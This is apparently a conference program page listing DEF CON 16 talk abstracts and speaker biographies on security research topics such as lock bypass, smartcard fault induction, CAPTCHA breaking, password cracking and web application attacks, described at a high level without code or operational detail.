Hirosh Joseph is currently working as a Web Security Researcher at F-Secure Corporation. He is the co-author of the book Vulnerability Analysis and Defense for the Internet, published by Springer (ISBN-10: 0387743898). Previously, he was working at Third Brigade, a Canada-based Information Security company. He was one of the early members of the Third Brigade Security Center and one of the key members of the research team. He has more than five years of experience in vulnerability research and is passionate about reverse engineering, malware analysis and spyware technologies. He has also held a security research position at Blue Lane Technologies.


Medical Identity Theft


Eric Smith
Assistant Director of Information Security and Networking, Bucknell University
Dr. Shana Dardan
Assistant Professor of Information Systems, Susquehanna University

In less than an hour, during a scheduled pentest, our team was able to retrieve 3.2 million patient insurance records from a HIPAA-compliant medical facility. Using these records, we could have generated counterfeit insurance and prescription cards which would pass muster at any doctor's office or pharmacy counter. If you are one of the 47 million Americans with no health insurance or happen to have a medical condition you wished to hide from employers or insurers, would you consider purchasing falsified medical documents? Thousands of Americans have already said yes, without thinking twice about the victim of their victimless crime.

What happens to you if your medical identity is stolen? You may find yourself liable for thousands of dollars of co-pays, deductibles, and denied claims. Is this because you forgot to shred an important document? Did you fall for a phishing scheme online? Of course not -- it was entirely outside of your control, and it happened because the current HIPAA regulations are insufficient to protect your medical identity.

In this talk, we'll review the current state of HIPAA and other laws covering the security of your medical records, and discuss what changes need to be made, both in policy and in practice, to shore up the security of our medical records.

Eric Smith is Assistant Director of Information Security and Networking at Bucknell University, located in Lewisburg, Pennsylvania. He has over 15 years of field experience in information security, networking, and systems administration. He has provided consultation services in places such as Research Triangle Park and New York City. Eric is a founding member of PreSet Kill Limit, the security research group which has won the Defcon Wardriving Contest the past several years.

Shana Dardan holds a PhD from the University of North Carolina at Charlotte in Information Technology. Currently, she is conducting research in the area of IT Investment Valuations and Digital Healthcare for hospitals nationwide. Shana has been an invited member of the WiSac and Pennsylvania Broadband task forces. Previous corporate research includes notable companies such as Intel Corp, where she conducted research for Doug Busch, VP and CIO on IT investment analysis. She speaks at industry events on investment strategies, IT security, and outsourcing and has contributed to numerous books. Shana joined Susquehanna University in 2006, where she teaches Systems Analysis and Design as well as IT Strategy.


CAPTCHAs: Are they really hopeless? (Yes)


Mike Spindel
Security Researcher
Scott Torborg
Web Application Developer

CAPTCHAs are widely used to protect websites against malicious robots. Yet, CAPTCHAs are being broken routinely by spammers, malware authors, and other nefarious characters. This talk will review and demonstrate many of the implementation weaknesses that are routinely exploited to break image-based CAPTCHAs, and offer suggestions for improving the effectiveness of CAPTCHAs. Rather than attempt an in-depth examination of any single CAPTCHA or technique, we will present a broad overview of tools with the aim of making it easy for anyone to take a shot at cracking the CAPTCHAs on present and future high-profile sites.

Mike is a recovering graduate student with a penchant for security research and good bourbon. His interests include distributed systems, MANETs, reverse engineering, and physical access control.

Scott Torborg is a web application developer in Silicon Valley. Although equally at home with an oscilloscope probing an electromechanical lock or tinkering with javascript obfuscation, he is most likely to be found indulging vices.


Living in the RIA World


Alex Stamos
Founding Partner, iSEC Partners Inc.
David Thiel
Senior Security Consultant, iSEC Partners
Justine Osborne
Security Consultant, iSEC Partners

Rich Internet Applications (RIA) represent the next generation of the Web. Designed to run without constant Internet connectivity, they provide a graphical experience equivalent to thick desktop applications with the easy install experience of thin Web apps. They intentionally blur the line between websites and traditional desktop applications and greatly complicate the jobs of web developers, corporate security teams, and external security professionals.

Our goal with this talk will be to outline the different attack scenarios that exist in the RIA world and to provide a comparison between the security models of the leading RIA platforms. We will discuss how current attacks against web applications are changed with RIA as well as outline new types of vulnerabilities that are unique to this paradigm. Attendees will learn how to analyze the threat posed to them by RIA applications as either providers or consumers of software built on these new platforms.

We will also be discussing the attack surface exposed by the large media codec stacks contained in each of these platforms. Our targeted platforms include Adobe AIR, Microsoft Silverlight, Google Gears, JavaFX, and Mozilla Prism. At this talk, we will be releasing tools for testing the codec security of these platforms as well as sample malicious code demonstrating the danger of RIA applications.

Alex Stamos is a Founding Partner of iSEC Partners and is an experienced security engineer and consultant specializing in application security and incident response. He is a leading researcher in the field of web application and web services security and has been a featured speaker at top industry conferences such as BlackHat, DefCon, SyScan, Infragard, Microsoft BlueHat, Toorcon, the Web 2.0 Expo and OWASP AppSec. He holds a BSEE from the University of California, Berkeley, and spends his spare time chasing his baby son and sailing on the SF bay.

David Thiel is a Senior Security Consultant with iSEC Partners. David has over 12 years of computer security experience, auditing and designing security infrastructure in the electronic commerce, government, aerospace and online wagering industries. His areas of expertise are web application penetration testing, network protocols, and fuzzing. Research interests include media software vulnerabilities, mobile and embedded device exploitation, and attack vectors in emerging web application technologies and network protocols. David has presented research and security topics at Black Hat USA as well as to the HTCIA.

Justine Osborne is a Security Consultant with iSEC Partners. Justine specializes in web application penetration testing and her research interests include AJAX web applications, Flash, and emerging web technologies. Justine holds a BA in Computer Science from Mills College in Oakland, California.

Top of page

Xploiting Google Gadgets: Gmalware and Beyond


Tom "strace" Stracener
Senior Security Analyst
Robert "Rsnake" Hansen
CEO SecTheory

Google Gadgets are symptomatic of the Way 2.0 Way of things: from lame gadgets that rotate through pictures of puppies to calendars, and inline email on your iGoogle homepage. This talk will analyze the security history of Google Gadgets and demonstrate ways to exploit Gadgets for nefarious purposes. We will also show ways to create Gadgets that allow you to port scan internal systems and do various JavaScript hacks via malicious (or useful) gadgets, depending on your point of view. We've already ported various JavaScript attack utilities to Google Gadgets (like PDP's JavaScript port scanner) among other things. We will also disclose a zero day vulnerability in Google Gadgets that makes Gmalware (Gmodules based malware) a significant threat.

Tom "strace" Stracener is Cenzic's Sr. Security Analyst reporting to the office of the CTO. Mr. Stracener was one of the founding members of nCircle Network Security. While at nCircle he served as the head of vulnerability research from 1999 to 2001, developing one of the industry's first quantitative vulnerability scoring systems, and co-inventing several patented technologies. Mr. Stracener is an experienced security consultant, penetration tester, and vulnerability researcher. One of his patents, 'Interoperability of vulnerability and intrusion detection systems,' was granted by the USPTO in October 2005. Tom is the Senior Security Analyst for Cenzic's CIA Labs. Tom has spoken at various conferences including New York Security Conference, ISSA, OWASP, Defcon, and others.

Robert "RSnake" Hansen (CISSP) is the Chief Executive Officer of SecTheory. SecTheory is a web application and network security consulting firm. Robert has been working with web application security since the mid 90's, beginning his career in banner click fraud detection at ValueClick. Robert has worked for Cable & Wireless heading up managed security services, and at eBay as Sr. Global Product Manager of Trust and Safety, focusing on anti-phishing, anti-cross-site scripting, and anti-virus strategies. Robert also sits on the technical advisory board of ClickForensics and contributes to the security strategy of several startup companies. Robert is best known for founding the web application security lab at ha.ckers.org and co-authoring XSS Exploits and Defense. Robert is a member of WASC, IACSP, and ISSA, and contributed to the OWASP 2.0 guide.

Top of page

Inducing Momentary Faults Within Secure Smartcards / Microcontrollers


Christopher Tarnovsky
Flylogic Engineering, LLC

This presentation is intended for individuals with an understanding of the Intel 8051 and Motorola 6805 processor families from an Assembly language perspective. This will be an interactive presentation with the audience.

Log files will be examined that have been taken from the targets (smartcards) at every clock cycle of the CPU during its runtime. We will discuss our possibilities and determine points in time (clock cycle periods) to momentarily induce a fault within the target.

Our goal will be to override the normal behavior of the target for our own use such as:

• Temporary changes - Readout of normally private records from the device
• Permanent changes - Change non-volatile memory to create a back-door or completely rewrite the behavior model

Both smartcards contain a cryptographic co-processor and are known to have been used to secure data, PCs, laptops and Sun Ray terminals.

Flylogic Engineering, LLC specializes in analysis of semiconductors from a security "how strong is it really" standpoint. We offer detailed reports on substrate attacks which define if a problem exists. If a problem is identified, we explain in a detailed report all aspects of how the attack was done, level of complexity and so on. This is something we believe is unique and allows the customer to then go back to the chip vendor armed with the knowledge to make them make it better (or possibly use a different part).

Top of page

Open in 30 Seconds: Cracking One of the Most Secure Locks in America


Marc Weber Tobias
Investigative Attorney and Security Specialist – Security.org
Matt Fiddler
Security Specialist – Security.org

Many high security lock manufacturers claim that their cylinders are impervious to covert methods of entry including picking, bumping, and decoding and that they offer high levels of key control, effectively preventing the illegal or unauthorized duplication of their keys. New and unique methods to compromise one of the most secure locks in America by forced, covert, and surreptitious entry were developed during an eighteen month research project that has resulted in the filing of multiple patents and the ability to pick, bump, and mechanically bypass Medeco cylinders, sometimes in seconds. In this presentation we offer a detailed analysis of how the Medeco lock was compromised by a methodical analysis of its physical characteristics and their code database.

Medeco is the dominant leader in the North American high security lock sector. They protect venues that include the White House, Pentagon, and Royal Family residence in London. They are relied upon throughout the world for their security and invulnerability to attacks. As a result of disclosures by the presenters at DEFCON 15, they were forced to urgently upgrade their deadbolt locks. The new techniques of bypass that will be disclosed in this presentation will be equally significant, if not even more concerning because of their widespread security implications.

Marc Weber Tobias is an investigative attorney and security specialist living in Sioux Falls, South Dakota. As part of his practice, he represents and consults with lock manufacturers, government agencies and corporations in the U.S. and overseas regarding the design and bypass of locks and security systems. He has authored six police textbooks, including Locks, Safes, and Security, which is recognized as the primary reference for law enforcement and security professionals worldwide. The second edition, a 1400 page two-volume work, is utilized by criminal investigators, crime labs, locksmiths and those responsible for physical security. A fourteen-volume multimedia edition of his book is also available online. His website is security.org.

As a former prosecutor and Chief of the Organized Crime Unit for the Office of Attorney General, state of South Dakota, Marc supervised many major investigations and prosecutions. He continues to work investigations for government and private clients, mainly involving technical fraud issues.

Marc is a member of a number of professional security organizations, including the American Society of Industrial Security (ASIS), Association of Firearms and Tool Marks Examiners (AFTE), American Polygraph Association (APA) and American Association of Police Polygraphists (AAPP).

Marc has lectured extensively in the United States and Europe on physical security and certain aspects of criminal investigations and interrogation technique. He holds several patents involving the bypass of locks and security systems. Marc contributes a column to engadget.com and has been featured in many publications as well as radio and television stories around the world.

Marc will be releasing his new book, entitled OPEN IN THIRTY SECONDS: Cracking one of the most secure locks in America, at Defcon 16. This 350 page work details an eighteen month research project which culminated in the ability to bypass all layers of security of Medeco cylinders, perhaps the most respected high security lock in the United States.

As a security researcher, Matt Fiddler has produced analyses of lock bypass techniques that have resulted in many public and private disclosures of critical lock design flaws. Mr. Fiddler began his career as an Intelligence Analyst with the United States Marine Corps. Since joining the commercial sector in 1992, he has spent the last 16 years enhancing his extensive expertise in the area of Unix and Network Engineering, Security Consulting, Computer Forensics, and Intrusion Analysis.

Top of page

Hijacking the Outdoor Digital Billboard Network


Tottenkoph
Business Analyst, Raymond James Financial
Rev
Security Researcher
Philosopher
Security Researcher

Outdoor digital billboards are becoming the new way to advertise multiple products/services/etc with a single board as compared to having a street littered with dozens of these eyesores. Therefore, they're more fun to take apart and play with. While driving one day, I noticed a 404 error on one of these billboards and after discussing it with my fellow speakers, hatched a plan to hack into their network and advertise our own ideas/"products". We will be talking about how we exploited the physical and network security of this well known company and used these to upload our own images. This is *not* a step-by-step how-to, but rather addresses the vulnerabilities that exist and how they could be used for guerrilla advertising and digital graffiti.

Tottenkoph- Business analyst, security consultant, crypto-fiend, hacker, and awesome chix0r. She started with hardware modding and PC repair stuff until the wonderful world of cryptography and open networks was stumbled upon. Tottenkoph is currently taking full advantage of the corporation's tuition and certification reimbursement programs while hopping from con to con insisting that it's "work related" and thus should be expensed (of course leaving out the amount of alcohol that can/will be consumed).

Rev- [insert elite bio here]

Philosopher- Student, budding old school phreak/hacker, polymath, and self-expressed amateur sociologist/social philosopher, as described by handle. Began with "power-use" (i.e., advanced comprehension and inquiry) of DOS and some Novell applications, as well as exploration into basic telephone electronics at the age of ten years. Currently a high school student enrolled in the International Baccalaureate program while voraciously seeking knowledge regarding several academic as well as technological fields. Specializes in and is absolutely fascinated with absolutely anything connected to the PSTN, with special emphasis on dial-up modem security, switching/PBX, voicemail, and landline telephone equipment/tests, as well as basic password security and human psychology as related to technology.

Top of page

How to make Friends & Influence Lock Manufacturers


Schuyler Towne
Executive Editor, Non-Destructive Entry Magazine
Jon King
Inventor, Medecoder

Locksport is growing up in America. In this talk we will explore four case studies demonstrating how the community has leveraged itself to bring about significant advances in the lock industry. We will demonstrate exploits discovered in both Medeco and ABUS high security locks and discuss how Kwikset's Smartkey system responded to the spread of information about bumping and how they plan to work with the community in the future. We will investigate the Robo-Key System, a new lock that has been developed in an open source atmosphere alongside the locksport community. Finally, a plea to the hacker community to help us continue the work we've started researching locking systems as more move into the electronic and digital realms and fostering positive relationships with the manufacturers.

Schuyler Towne is a competitive lockpicker, TOOOL member, and Executive Editor of NDE Magazine. He has spent the last year trying to resolve the ethics of responsible disclosure in physical security and bridge the gap between locksport and lock manufacturers.

Jon King is a locksport enthusiast currently serving in the US Navy. He has no experience as a locksmith nor does he hold any professional certifications of any kind. Instead, he enjoys what most locksmiths do not: the hacker spirit. He spends his free time analyzing and defeating high-security mechanical locks.

Top of page

Evade IDS/IPS Systems using Geospatial Threat Detection


Ryan Trost
Director of Security, Comprehensive Health Services

IDS/IPS systems are becoming more and more advanced and geocoding is adding another layer of intelligence to try and defend against a company's vulnerabilities. Learn how to evade complex geospatial threat detection countermeasures. Most crackers use zombie machines to launch professional attacks...but zombies even leave geographic fingerprints that are easily picked up by pattern recognition algorithms. Learn how to take professional attacks to the next level.

Ryan Trost is the Director of Security and the Data Privacy Officer at Comprehensive Health Services where he oversees all the organization's security and privacy decisions. He teaches several Information Technology courses including Ethical Hacking, Intrusion Detection and Data Visualization at Northern Virginia Community College which allows him to continue his technical interests. In his spare time he is working to cross-pollinate Network Security, Geographical Information Systems (GIS) and Data Visualization and is considered a leading expert in geospatial intrusion detection techniques. Ryan participated as a RedTeamer in the first annual Collegiate Cyber Defense Competition (CCDC) and fielded a team of students this past year. Ryan has been a Senior Security Consultant for several government agencies before transitioning over to the private sector. In 2005, Ryan received his MS degree in Computer Science from George Washington University where he developed his first geospatial intrusion detection tool.

Top of page

MetaPost-Exploitation


Valsmith
CTO, Offensive Computing, LLC
Colin Ames
Researcher, Offensive Computing, LLC

When penetration testing large environments, testers require the ability to maintain persistent access to systems they have exploited, leverage trusts to access other systems, and increase their foothold into the target. Post exploitation activities are some of the most labor intensive aspects of pen testing. These include password management, persistent host access, privilege escalation, trust relationships, acquiring GUI access, etc. Penetration testers acquire hashes, crack them, keep track of which passwords go with which usernames / systems and finally reuse this information to penetrate further systems.

Valsmith has been involved in the computer security community and industry for over ten years. He currently works as a professional security researcher on problems for both the government and private sectors. He specializes in penetration testing (over 40,000 machines assessed), reverse engineering and malware research. Valsmith is a member of the Cult of the Dead Cow NSF. He also works on the Metasploit Project development team as well as other vulnerability development efforts. Most recently Valsmith founded Offensive Computing, a public, open source malware research project.

Colin Ames is a security researcher with Offensive Computing LLC where he consults for both the private and public sectors. He's currently focused on Pen testing, Reverse Engineering, Malware Analysis and Steganographic research. He has spoken previously at RSA and other venues.

Top of page

Keeping Secret Secrets Secret and Sharing Secret Secrets Secretly


Vic Vandal
504 / NOLAB / NC2600

Have you ever wanted to:

If you answered "YES" to any of these questions then this talk is for you. Vic will walk you through the shadowy world of secret-splitting, steganography, spy tactics, and other methods to hide and/or exchange sensitive materials and information - without the use of traditional cryptography. Both digital and physical protection schemes will be covered during the course of the presentation. The audience will also get to play along in a handful of online challenges. So gird your loins, lock up your women and children, put on your dark sunglasses, and come join the fun.

For those interested in playing along during the stego portion of the talk, consider pre-installing any/all of the following tools:
- GifItUp (Windows)
- S-Tools (Windows)
- JPHS (Windows)
- MP3Stego (Windows or Linux)
- Camouflage (Windows)
- Stego (Mac)
- Hydan (Linux)

Vic Vandal is his name, digital havoc is his game! From skateboards to keyboards and everything in between, Vic can manipulate, conjugate, and detonate his tactical skills (that pay the bills) to burn your eyes with visual napalm!

Trained in cyber-warfare by the United States armed forces (actually it was more vice-versa, but such details are unimportant), Vic is now a digital mercenary ready to unleash his diabolical digital deeds for the right price.

His objective? Communications! A modern day ENIAC, Vic makes, creates, and propagates the everyday analog into digital mayhem for the masses. A Wizard of Oz in his own private cyber-wonderland, he is on his way to taking over all global transmissions. All your base are belong to him!

Top of page

Compliance: The Enterprise Vulnerability Roadmap


Weasel
Nomad Mobile Research Centre

Compliance is no longer new. Compliance has been accepted by the corporate-state. Compliance is common-place. Compliance is the intruders' new friend. Decision makers think Compliance == Security. While many compliance standards have resulted in the implementation of some very important controls, they have also left a roadmap for intruders, ill doers and the sort to hone their attack. This presentation will go over such weaknesses and show how compliance entities are, regardless of intent, proving that compliance != security.

Weasel is a veteran member of Nomad Mobile Research Centre. Over the years he has performed deep research into areas ranging from Forensics/Anti-Forensics to Enterprise Culture to Cyber Warfare and Binary Analysis. Weasel is the last surviving international member of NMRC as Canada has been ruled too lame to be considered "international."

Top of page

Password Cracking on a Budget


Matt Weir
Security Researcher
Sudhir Aggarwal
Security Researcher

Not every bad guy writes down passwords on a sticky note by their monitor. Not every system administrator fully documents everything before they leave. There are a lot of legitimate reasons why you might need to crack a password. The problem is most people don't have a supercomputer sitting in their basement or the money to go out and buy a rack of FPGAs. This talk deals with getting the most out of the computing resources you do have when cracking passwords.

Our group at Florida State University is currently working on password cracking research to aid in forensics analysis. We've analyzed disclosed password lists to try and figure out how real people actually create passwords. Not all of these lists have been in plain text so we've had to go through the pain of cracking passwords ourselves. Just like you, we are still waiting on funding for that supercomputer as well. In this talk, we'll go over some of the tools and techniques we've used to crack these password lists using only a couple of PCs, such as custom wordlist generation and choosing the right word mangling rules. We'll also talk about some of the lessons we've learned and the mistakes we've made along the way.

Matt Weir is a PhD student at Florida State University. Before his journey back into academia, he worked as a network security engineer for Northrop Grumman. The projects he's been a part of have ranged from providing first responders with wireless access, to assisting the Defense Department with computer forensics. Why he decided to go back to school no one knows (including him sometimes). It wasn't the pay that's for sure!

Sudhir Aggarwal has been Professor of Computer Science at Florida State University since the fall of 2002. He directs the E-Crime Investigative Technologies Laboratory. Previous to his current position, he was Chief Technology Officer of the Internet Content Delivery and Distribution business unit of Lucent Technologies, where he was responsible for the architecture, portfolio, and development of the Imminet product line. Dr. Aggarwal's current research interests are in building software tools and systems that support cybersecurity and digital forensics. He is also interested in computer and communication networks where he has investigated infrastructures for network games and techniques for building efficient overlay networks.

Top of page

RE:Trace: The Reverse Engineer's Unexpected Swiss Army Knife


David Weston
Security Engineer, SAIC
Tiller Beauchamp
Senior Security Engineer, SAIC

This presentation will detail the newest developments in RE:Trace, a reverse engineering framework based on Ruby and DTrace. We will discuss implementations for walking and searching the heap on OS X, tracing for kernel and driver vulnerabilities, pinpointing format string bugs and leveraging custom application probes, such as those built into browser and database software.

David Weston is a security researcher and penetration tester at Science Applications International Corporation. Pursuing a graduate degree, his research interests include fuzzing and reverse engineering. He has an undergraduate degree from the University of California at Santa Barbara.

Tiller Beauchamp works as a senior security consultant for SAIC providing security auditing services to large commercial, state and DoD customers. His areas of expertise include network penetration testing, web application security, IPv6 and exploit development. Beauchamp earned his M.S. in Computer Science from the University of Oregon with a specialization in software engineering. He has worked as the lead developer for Team Defend, SAIC's portable computer and network defense exercise. Beauchamp is also responsible for maintaining the company's penetration toolkit and penlab.

Top of page

Mobile Hacker Space


Thomas Wilhelm
Founder, De-ICE.net

There has been a recent global push for the creation of Hacker Spaces. Unfortunately, these ventures are risky and can be quite costly. In an effort to provide an alternative, or at least an intermediary step, this talk will discuss a different type of Hacker Space, one that is on wheels. During the course of this speech, we will discuss the advantages and disadvantages of building a mobile hacker space, and present a real-world example, which will be open to tours at DefCon (as long as it doesn't break down before it gets there). We will talk about the problems and solutions associated with the development of a mobile hacker space, and offer ideas for future designs. In addition, a list of current and future hacker projects will be discussed, and include IT-related and vehicle-related hacks.

Thomas Wilhelm: Currently employed in a Fortune 50 company performing penetration testing and risk assessments, Thomas has spent over 15 years in the Information System career field, and has received the following certifications: ISSMP, CISSP, SCSECA, SCNA, SCSA, IAM. Thomas is currently a PhD student, and is the founder of the De-ICE.net PenTest LiveCD project. Thomas has written for Hakin9 magazine, and has been published in multiple books, including: Penetration Tester's Open Source Toolkit, Volume 2; Metasploit Toolkit for Penetration Testing; and Netcat Toolkit, all available through Syngress Publishing.

Top of page

Web Privacy and Flash Local Shared Objects


Clinton Wong
Security Researcher

This talk discusses privacy issues concerning Adobe Flash Local Shared Objects. Adobe LSOs are similar to HTTP cookies, but not as easily controlled or configured using a standard web browser. Potential problems with Flash LSOs will be presented, as well as suggestions for increasing privacy while using Adobe LSOs.

Clinton Wong published HTTP Pocket Reference and Web Client Programming with Perl. He works in Silicon Valley.


Top of page

New ideas for old practices - Port-Scanning improved


Fabian "fabs" Yamaguchi
Recurity Labs GmbH, Berlin, Germany
FX
Head of Recurity Labs

How fast a port-scan can be is largely dependent on the performance of the network in question. Nonetheless, it is clear that choosing the most efficient scanning speed is only possible based on sufficient information on the network's performance. We have thus designed and implemented a port-scanning method which provokes extra network activity to increase the amount of information at our disposal in an attempt to gain speed in the long run.

Following this approach, we've managed to mimic TCP's properties to an extent which allows us to implement many congestion control schemes initially designed for TCP. Further tweaking the actual implementation by integrating it into the Linux kernel left us with a port-scanner ready to tackle big networks at an impressive speed.

Fabian "fabs" Yamaguchi currently studies computer science and electrical engineering at the Berlin Institute of Technology, where he focuses on data communication and signal processing. He has been working as a reverse engineer and software developer for Recurity Labs GmbH for about two years. During his school time, he worked on free software projects such as the AfterStep window manager, and he received the ArsDigita Prize at MIT in 2001 for maintaining the "Young Programmer's Network", a community project for young free software developers. Additionally, he has given presentations on port scanning and bug exploitation at the 24C3 and the 4th annual MNU congress in Berlin.

Felix "FX" Lindner runs Recurity Labs. FX has over 10 years experience in the computer industry, eight of them in consulting for large enterprise and telecommunication customers. He possesses a vast knowledge of computer sciences, telecommunications and software development. His background includes managing and participating in a variety of projects with a special emphasis on security planning, implementation, operation and testing using advanced methods in diverse technical environments. FX is well known in the computer security community and has presented his and Phenoelit's security research on Black Hat Briefings, CanSecWest, PacSec, DEFCON, Chaos Communication Congress, MEITSEC and numerous other events. His research topics included Cisco IOS, HP printers, SAP and RIM BlackBerry. Felix holds a title as State-Certified Technical Assistant for Informatics and Information Technology as well as Certified Information Systems Security Professional.

Top of page

The Death Envelope: A Medieval Solution to a 21st Century Problem


Matt Yoder
Security Researcher

While many aftercare solutions and recommendations cover "average American" needs, none have tackled, full-on, the needs of the rapidly growing high tech segment of the population. As the number of passwords and other secret "brainspace-only" information grows for many, many individuals, it becomes obvious that a solution is needed for the dispensation of this information in the event of one's death or extreme disablement. It turns out that this solution may be the humble paper envelope.

This talk begins to examine an approach to handle this problem, offering many suggestions, from the extremely reliable low-tech end, through hybrid and high tech solutions to the problem. It covers, as well, recommendations for what to include in one's envelope, and how to ensure its safety, security, and integrity. It also discusses why a wax stamp, sealed by a signet ring, no less, may still offer the best envelope tamper detection that exists.

Matt Yoder brings more than 15 years of general IT experience to this talk, including extensive time in systems administration of all flavors, including multiple forms of network devices. He has also spent time, in multiple stints, performing direct security consulting, including assessment and auditing, security systems support, and firewall deployment. When this experience is combined with a love of pen and paper, a detailed examination of the Death Envelope is the result. He currently spends his days, and earns something resembling an income, assisting with server administration for a major University in Colorado, which prefers to go unnamed.

Top of page

DAVIX Visualization Workshop

Need help understanding your gigabytes of application logs or network captures? Your OS performance metrics do not make sense? Then DAVIX, the live CD for visualizing IT data, is your answer!

To simplify the analysis of vast amounts of security data, visualization is slowly penetrating the security community. There are many free tools available for analysis and visualization of data. To simplify the use of these tools, the open source project DAVIX was brought to life and is released this year at BlackHat/DEFCON.

At this "Bring Your Own Laptop" workshop we will introduce you to DAVIX. The workshop starts with an introduction to the set of available tools, the integrated manual, as well as customizing the CD to your needs. In a second part, you can use DAVIX to analyze a set of provided packet captures. In the end we will show some of the visualizations created by the participants. Be prepared for pretty and meaningful pictures!

For you to be able to participate in the analysis part of the workshop, you should bring an Intel or AMD x86 based notebook with at least 1GB of memory and a wireless LAN adapter. To avoid problems with the Wireless card setup we strongly recommend that you run DAVIX in VMware Player or VMware Fusion in NAT mode. The DAVIX ISO image should be downloaded before the workshop from the davix.secviz.org homepage. The network capture files will be made available during the workshop.

Jan P. Monsch is a senior security analyst with the leading Swiss security assessment company Compass Security AG. He has almost 10 years of experience in the field of IT security, most of it in the Swiss banking and insurance industry. His talent in understanding and assessing security in large environments has gotten him involved in several outsourcing projects with international participation. Apart from reviewing security, he has trained many software developers, IT engineers and security officers in the fields of application and content security. His passion for application security and interest in better understanding security in real-world applications has led him to the field of security visualization. The lack of broadly available solutions for data analysis and security visualization has motivated him to create DAVIX - The Data Analysis & Visualization Linux.

Raffael Marty: As chief security strategist and senior product manager, Raffy is customer advocate and guardian - expert on all things security and log analysis at Splunk. With customers, he uses his skills in data visualization, log management, intrusion detection, and compliance to solve problems and create solutions. Inside Splunk, he is the conduit for customer issues, new ideas and market requirements to the development team. Fully immersed in industry initiatives, standards efforts and activities, Raffy lives and breathes security and visualization. His passion for visualization is evident in the many presentations he gives at conferences around the world and the upcoming "Applied Security Visualization" book. In addition, Raffy is the author of AfterGlow, founder of the security visualization portal http://secviz.org, and contributing author to a number of books on security and visualization.

Top of page